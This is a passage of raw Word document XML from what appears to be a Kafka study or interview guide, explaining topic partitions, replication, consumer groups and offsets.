    <w:p w14:paraId="4703F069"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Each message within a partition is assigned a uniqu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which acts as an identifier for the message. Consumers track their progress by maintaining their last processed offset for each partition, allowing for fine-grained control over message consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2AD364"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FE592">
          <v:rect id="_x0000_i3386" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFCAF1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Why are Partitions Used in Kafka?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED5163C"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Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC2EDC2"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is designed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Increased Throughput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B8B19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Fault Tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681DCC8D"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plicates each partition to multiple brokers. If one broker fails, another broker that holds a replica of the partition can take over as the leader, ensuring </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no data los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of messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3D2A3E"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4. Load Balancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778A716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5. Message Parallelism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E362E5"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9717EF">
          <v:rect id="_x0000_i3387" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="564360C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ing: How Data is Stored and Consumed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E3C0A0"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When a producer sends a message to a Kafka topic, Kafka determines to which partition the message will be written. If a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition key</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (such as the message's key) is provided, Kafka uses it to determine the partition. If no key is provided, Kafka will distribute the messages randomly (or using a round-robin approach).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4961A546"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 and Replication</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420E3EA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Leader</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Each partition has a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replica that handles all read and write requests. The leader is responsible for ensuring data consistency across replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3787614B"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Follower</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Each partition also has </w:t>
      </w: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which replicate the data from the leader. In case of a leader failure, one of the followers is promoted to become the new leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC4A0B"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 and Consumer Groups</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA172F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s</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A group of consumers working together is called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Kafka assigns each consumer in the group to one or more partitions. This means each partition is read by only one consumer within a group at a time, ensuring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in data consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC562CD"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 Kafka keeps track of the offsets for each partition. Each consumer reads from a partition and commits the offset to remember where it left off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726C14EE"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E1C72">
          <v:rect id="_x0000_i3388" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="376BF316"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of Kafka Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435959F3"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Let’s say we have a Kafka topic named order_topic, and it has </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3 partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DC99A4"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p w14:paraId="0AFF04AB"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p w14:paraId="7462D0A9"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p w14:paraId="0DEBDA9C"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1551"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="66030987" w14:textId="77777777" w:rsidTr="00DD2097">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="063A71FF"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B340727"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="62C1C156" w14:textId="77777777" w:rsidTr="00DD2097">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D91803F"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71F1C28E"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1, Order 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="2F565D39" w14:textId="77777777" w:rsidTr="00DD2097">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E22F4E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5E1A3B0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2, Order 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="4A0ED6F4" w14:textId="77777777" w:rsidTr="00DD2097">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F430E9A"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6A93FAF1"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3, Order 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36591B98"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15F51E">
          <v:rect id="_x0000_i3389" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13845E9A"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Using Partitions in Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582DFF41"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The ability to add more partitions across more brokers allows Kafka to scale horizontally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A63B20"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Distribution</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consumers can read from different partitions concurrently, allowing for parallel message processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3724A6"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Partition replication ensures that data is always available, even if a broker fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4185CF0B"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Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Partitioning allows Kafka to store massive amounts of data efficiently, keeping each partition manageable in size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FCAF9D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E9ECC1"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allow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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132C965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enable </w:t>
      </w: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y distributing messages across multiple brokers and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30901C3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rdering</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is guaranteed </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>within</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a partition, but not across partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23971B9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ability to partition data enables efficient </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message consumption</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storage</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> while supporting high availability through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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770A0668" w14:textId="4E865621" w:rsidR="00DD2097" w:rsidRPr="00CE4B95"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390" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="064DEC26" w14:textId="12E4913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5" w:name="_Toc197868049"/>
      <w:r w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="835"/>
    </w:p>
    <w:p w14:paraId="53791EE6" w14:textId="220AA777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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Concept and Importance in Parallel Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A34B2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partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are an essential feature of Kafka’s design that allow it to handle large volumes of data efficiently.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essentially a unit of </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data storage</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Kafka Partitions Enable Parallel Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D8CF5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Distribution Across Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F95EE1B"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opics can be divided into multiple partitions. Each partition is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are written in the order they are received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DC449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Parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A4A9E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because each partition can be consumed by a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or thread) within a consumer group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15163765"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parallelism ensures that Kafka can handle large amounts of data and scale horizontally by adding more partitions or consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13763681"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ing Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3915ABE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Distributing Data Across Multiple Partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F51A24D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CC5E07"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By distributing data across multiple partitions, Kafka can handle more messages per second. Since multiple consumers can read from different partitions in parallel, Kafka achieves </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>higher throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and faster message consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30402EB3"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Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294C621E"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plication enhances fault tolerance, making Kafka highly available and resilient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ADF045"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E777F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help with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ecause different partitions can be distributed across different brokers. This prevents any single broker from becoming a bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF2CE3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group can scale by increasing the number of consumers. Each consumer reads from a different partition, allowing the overall processing load to be distributed evenly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDD3139"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 Within a Partition</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB648A0"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is crucial for use cases where the order of messages is important, such as financial transactions, where consistency and sequencing are essential.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A1361E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA611C9"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 As the volume of data grows, you can add more partitions and brokers to increase Kafka’s capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000533A6"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re partitions allow more consumers to work in parallel, which results in better utilization of system resources (e.g., CPU, memory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629B22CC"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Storage Management</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7492CE7D"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partitions are log-based, Kafka can store messages in a compact and efficient manner, which helps with handling massive streams of real-time data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F24F5A"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ractical Example of Kafka Partitions in Parallel Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDB0E1A"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8E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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2"/>
        <w:gridCol w:w="1934"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="2F36F1F2" w14:textId="77777777" w:rsidTr="00304319">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BD769D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2046F83"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 (Orders)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="69C21DC0" w14:textId="77777777" w:rsidTr="00304319">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69ECA668"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36B8C749"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A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="63DE9D1B" w14:textId="77777777" w:rsidTr="00304319">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56FC2D9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236E91D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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="7301EFAD" w14:textId="77777777" w:rsidTr="00304319">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E3DFC2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5AFE90B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C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="314D37FE" w14:textId="77777777" w:rsidTr="00304319">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C54B915"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="494D309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D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A69D4C6"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A consumer group order-consumers with 4 consumers is assigned to the topic. Each consumer reads from one partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4914B76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1 reads from Partition 0 (Region A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACCAD7B"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2 reads from Partition 1 (Region B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592810F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3 reads from Partition 2 (Region C).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711F9FEE"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4 reads from Partition 3 (Region D).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6547633F"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each partition is read by a different consumer in parallel, the system can handle multiple orders at the same time, improving throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB75667"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 and Recover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If a broker fails, one of the replicas of the partition takes over as the leader, and the consumers can continue processing without interruption. Kafka automatically handles the failover process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7AAA8C"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 of Kafka Partitioning Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEDA3E3"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Parallel Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka partitions allow multiple consumers to process messages simultaneously, improving data consumption rates and throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB50BEF"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Kafka scales horizontally by adding more partitions, which increases parallelism and overall capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5597D32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Partition replication ensures that data is available even if a broker fails, enhancing reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8D28D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Partitions help distribute the processing load across multiple brokers, achieving higher throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E654CA7"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Load Balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Partitions allow for better load distribution, preventing any broker from becoming a bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3A5624"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Kafka guarantees message ordering within a partition, which is critical for many use cases that rely on the sequence of messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C079B1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Pr="00CE4B95"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391" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEF302A" w14:textId="6066F67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6" w:name="_Toc197868050"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the concept of Kafka offset and how it is managed by consumers</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="836"/>
    </w:p>
    <w:p w14:paraId="3DE383A9" w14:textId="25CB6BCE" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="0041245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Concept and Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3EC92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ept of Kafka Offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE838C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inition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D69E3C"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numerical identifier assigned to each message within a Kafka partition. The offset starts at 0 and increases incrementally for each subsequent message in the partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B810DE8"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meaning that each partition of a Kafka topic has its own sequence of offsets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FF5A4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Offset for Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
